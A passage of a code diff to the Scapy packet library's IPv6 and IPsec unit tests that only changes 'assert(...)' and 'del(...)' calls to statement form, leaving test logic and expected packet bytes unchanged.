= raw(IPv6()/IPv6ExtHdrSegmentRouting()/UDP()) -assert(s == b'`\x00\x00\x00\x00 +@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x02\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x005\x005\x00\x08\xffr') +assert s == b'`\x00\x00\x00\x00 +@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x02\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x005\x005\x00\x08\xffr' p = IPv6(s) -assert(UDP in p and IPv6ExtHdrSegmentRouting in p) -assert(p[IPv6ExtHdrSegmentRouting].lastentry == 0 and len(p[IPv6ExtHdrSegmentRouting].addresses) == 1 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 0) +assert UDP in p and IPv6ExtHdrSegmentRouting in p +assert p[IPv6ExtHdrSegmentRouting].lastentry == 0 and len(p[IPv6ExtHdrSegmentRouting].addresses) == 1 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 0 = IPv6ExtHdrSegmentRouting Class - addresses list - build & dissect s = raw(IPv6()/IPv6ExtHdrSegmentRouting(addresses=["::1", "::2", "::3"])/UDP()) -assert(s == b'`\x00\x00\x00\x00@+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x06\x04\x02\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x005\x005\x00\x08\xffr') +assert s == b'`\x00\x00\x00\x00@+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x06\x04\x02\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x005\x005\x00\x08\xffr' p = IPv6(s) -assert(UDP in p and IPv6ExtHdrSegmentRouting in p) -assert(p[IPv6ExtHdrSegmentRouting].lastentry == 2 and len(p[IPv6ExtHdrSegmentRouting].addresses) == 3 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 0) +assert UDP in p and IPv6ExtHdrSegmentRouting in p +assert p[IPv6ExtHdrSegmentRouting].lastentry == 2 and len(p[IPv6ExtHdrSegmentRouting].addresses) == 3 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 0 = IPv6ExtHdrSegmentRouting Class - TLVs list - build & dissect @@ -101,25 +101,25 @@ s = raw(IPv6()/IPv6ExtHdrSegmentRouting(tlv_objects=[IPv6ExtHdrSegmentRoutingTLV assert s == b'`\x00\x00\x00\x00<+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x000\x00\x00\x00\x00\x00\x00\x04\x05\x00\x00\x00\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x8f}\x00\x00' p = IPv6(s) -assert(TCP in p and IPv6ExtHdrSegmentRouting in p) -assert(p[IPv6ExtHdrSegmentRouting].lastentry == 0) -assert(len(p[IPv6ExtHdrSegmentRouting].addresses) == 1 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 2) -assert(isinstance(p[IPv6ExtHdrSegmentRouting].tlv_objects[1], IPv6ExtHdrSegmentRoutingTLVPadN)) +assert TCP in p and IPv6ExtHdrSegmentRouting in p +assert p[IPv6ExtHdrSegmentRouting].lastentry == 0 +assert len(p[IPv6ExtHdrSegmentRouting].addresses) == 1 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 2 +assert isinstance(p[IPv6ExtHdrSegmentRouting].tlv_objects[1], IPv6ExtHdrSegmentRoutingTLVPadN) = IPv6ExtHdrSegmentRouting Class - both lists - build & dissect s = raw(IPv6()/IPv6ExtHdrSegmentRouting(addresses=["::1", "::2", "::3"], tlv_objects=[IPv6ExtHdrSegmentRoutingTLVIngressNode(),IPv6ExtHdrSegmentRoutingTLVEgressNode()])/ICMPv6EchoRequest()) -assert(s == b'`\x00\x00\x00\x00h+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x0b\x04\x02\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x01\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x80\x00\x7f\xbb\x00\x00\x00\x00') +assert s == b'`\x00\x00\x00\x00h+@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x0b\x04\x02\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x01\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x80\x00\x7f\xbb\x00\x00\x00\x00' p = IPv6(s) -assert(p[IPv6ExtHdrSegmentRouting].lastentry == 2) -assert(ICMPv6EchoRequest in p and IPv6ExtHdrSegmentRouting in p) -assert(len(p[IPv6ExtHdrSegmentRouting].addresses) == 3 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 2) +assert p[IPv6ExtHdrSegmentRouting].lastentry == 2 +assert ICMPv6EchoRequest in p and IPv6ExtHdrSegmentRouting in p +assert len(p[IPv6ExtHdrSegmentRouting].addresses) == 3 and len(p[IPv6ExtHdrSegmentRouting].tlv_objects) == 2 = IPv6ExtHdrSegmentRouting Class - UDP pseudo-header checksum - build & dissect s= raw(IPv6(src="fc00::1", dst="fd00::42")/IPv6ExtHdrSegmentRouting(addresses=["fd00::42", "fc13::1337"][::-1], segleft=1, lastentry=1) / UDP(sport=11000, dport=4242) / Raw('foobar')) -assert(s == b'`\x00\x00\x00\x006+@\xfc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\x11\x04\x04\x01\x01\x00\x00\x00\xfc\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x137\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B*\xf8\x10\x92\x00\x0e\x81\xb7foobar') +assert s == b'`\x00\x00\x00\x006+@\xfc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\x11\x04\x04\x01\x01\x00\x00\x00\xfc\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x137\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B*\xf8\x10\x92\x00\x0e\x81\xb7foobar' ############ @@ -867,10 +867,10 @@ raw(ICMPv6NDOptRedirectedHdr(pkt=IPv6())) == b'\x04\x06\x00\x00\x00\x00\x00\x00` = ICMPv6NDOptRedirectedHdr - Basic Dissection ~ ICMPv6NDOptRedirectedHdr a=ICMPv6NDOptRedirectedHdr(b'\x04\x00\x00\x00') -assert(a.type == 4) -assert(a.len == 0) -assert(a.res == b"\x00\x00") -assert(a.pkt == b"") +assert a.type == 4 +assert a.len == 0 +assert a.res == b"\x00\x00" +assert a.pkt == b"" = ICMPv6NDOptRedirectedHdr - Disssection with specific values ~ ICMPv6NDOptRedirectedHdr @@ -886,7 +886,7 @@ a.type == 4 and a.len == 6 and a.res == b"\x00\x00\x00\x00\x00\x00" and isinstan ~ ICMPv6NDOptRedirectedHdr x=ICMPv6NDOptRedirectedHdr(b'\x04\x06\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') y=x.copy() -del(y.len) +del y.len x == ICMPv6NDOptRedirectedHdr(raw(y)) # Add more tests @@ -1769,17 +1769,17 @@ Ether in l = defragment6 - test against a large TCP packet fragmented with a 1280 bytes MTU and missing fragments l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*40000), 1280) -del(l[2]) -del(l[4]) -del(l[12]) -del(l[18]) +del l[2] +del l[4] +del l[12] +del l[18] raw(defragment6(l)) == (b'`\x00\x00\x00\x9cT\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xe92\x00\x00' + 2444*b'A' + 1232*b'X' + 2464*b'A' + 1232*b'X' + 9856*b'A' + 1232*b'X' + 7392*b'A' + 1232*b'X' + 12916*b'A') = defragment6 - test against a TCP packet fragmented with a 800 bytes MTU and missing fragments l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*4000), 800) -del(l[4]) -del(l[2]) +del l[4] +del l[2] raw(defragment6(l)) == b'`\x00\x00\x00\x0f\xb4\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xb2\x0f\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' = defragment6 - test the packet length @@ -1843,9 +1843,9 @@ len_r6 = len(r6.routes) = Route6 - Route6.add & Route6.delt r6.add(dst="2001:db8:cafe:f000::/64", gw="2001:db8:cafe::1", dev="eth0") -assert(len(r6.routes) == len_r6 + 1) +assert len(r6.routes) == len_r6 + 1 r6.delt(dst="2001:db8:cafe:f000::/64", gw="2001:db8:cafe::1") -assert(len(r6.routes) == len_r6) +assert len(r6.routes) == len_r6 = Route6 - Route6.ifadd & Route6.ifdel r6.ifadd("scapy0", "2001:bd8:cafe:1::1/64") @@ -2861,7 +2861,7 @@ def test_show(): expected += "11 2001:db8::11 3 \n" index_result = result.index("\n1") index_expected = expected.index("\n1") - assert(result[index_result:] == expected[index_expected:]) + assert result[index_result:] == expected[index_expected:] test_show() diff --git a/test/scapy/layers/ipsec.uts b/test/scapy/layers/ipsec.uts index b2c4ded6d11..abdbb27fe39 100644 --- a/test/scapy/layers/ipsec.uts +++ b/test/scapy/layers/ipsec.uts @@ -26,20 +26,20 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Transport - DES - NULL @@ -57,22 +57,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an ESP layer -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] # Generated with Linux 4.4.0-62-generic #83-Ubuntu # ip xfrm state add src 10.125.0.2 dst 10.125.0.1 proto esp spi 546 reqid 1 \ @@ -91,7 +91,7 @@ d_ref = sa.decrypt(ref) d_ref * Check for ICMP layer in decrypted reference -assert(d_ref.haslayer(ICMP)) +assert d_ref.haslayer(ICMP) ####################################### = IPv4 / ESP - Transport - 3DES - NULL @@ -109,22 +109,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum * the encrypted packet should have an ESP layer -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] # Generated with Linux 4.4.0-62-generic #83-Ubuntu # ip xfrm state add src 10.125.0.2 dst 10.125.0.1 proto esp spi 546 reqid 1 \ @@ -143,7 +143,7 @@ d_ref = sa.decrypt(ref) d_ref * Check for ICMP layer in decrypted reference -assert(d_ref.haslayer(ICMP)) +assert d_ref.haslayer(ICMP) ####################################### = IPv4 / ESP - Transport - AES-CBC - NULL @@ -161,21 +161,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] # Generated with Linux 4.4.0-62-generic #83-Ubuntu # ip xfrm state add src 10.125.0.2 dst 10.125.0.1 proto esp spi 546 reqid 1 \ @@ -195,7 +195,7 @@ d_ref = sa.decrypt(ref) d_ref * Check for ICMP layer in decrypted reference -assert(d_ref.haslayer(ICMP)) +assert d_ref.haslayer(ICMP) ####################################### = IPv4 / ESP - Transport - AES-CTR - NULL @@ -213,21 +213,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] # Generated with Linux 4.4.0-62-generic #83-Ubuntu # ip xfrm state add src 10.125.0.2 dst 10.125.0.1 proto esp spi 546 reqid 1 \ @@ -246,7 +246,7 @@ d_ref = sa.decrypt(ref) d_ref * Check for ICMP layer in decrypted reference -assert(d_ref.haslayer(ICMP)) +assert d_ref.haslayer(ICMP) ####################################### = IPv4 / ESP - Transport - Blowfish - NULL @@ -264,21 +264,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] # Generated with Linux 4.4.0-62-generic #83-Ubuntu # ip xfrm state add src 10.125.0.2 dst 10.125.0.1 proto esp spi 546 reqid 1 \ @@ -297,7 +297,7 @@ d_ref = sa.decrypt(ref) d_ref * Check for ICMP layer in decrypted reference -assert(d_ref.haslayer(ICMP)) +assert d_ref.haslayer(ICMP) ####################################### = IPv4 / ESP - Transport - CAST - NULL @@ -315,21 +315,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] # Generated with Linux 4.4.0-62-generic #83-Ubuntu # ip xfrm state add src 10.125.0.2 dst 10.125.0.1 proto esp spi 546 reqid 1 \ @@ -348,7 +348,7 @@ d_ref = sa.decrypt(ref) d_ref * Check for ICMP layer in decrypted reference -assert(d_ref.haslayer(ICMP)) +assert d_ref.haslayer(ICMP) ############################################################################### + IPv4 / ESP - Tunnel - Encryption Algorithms @@ -371,21 +371,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Tunnel - DES - NULL @@ -404,23 +404,23 @@ 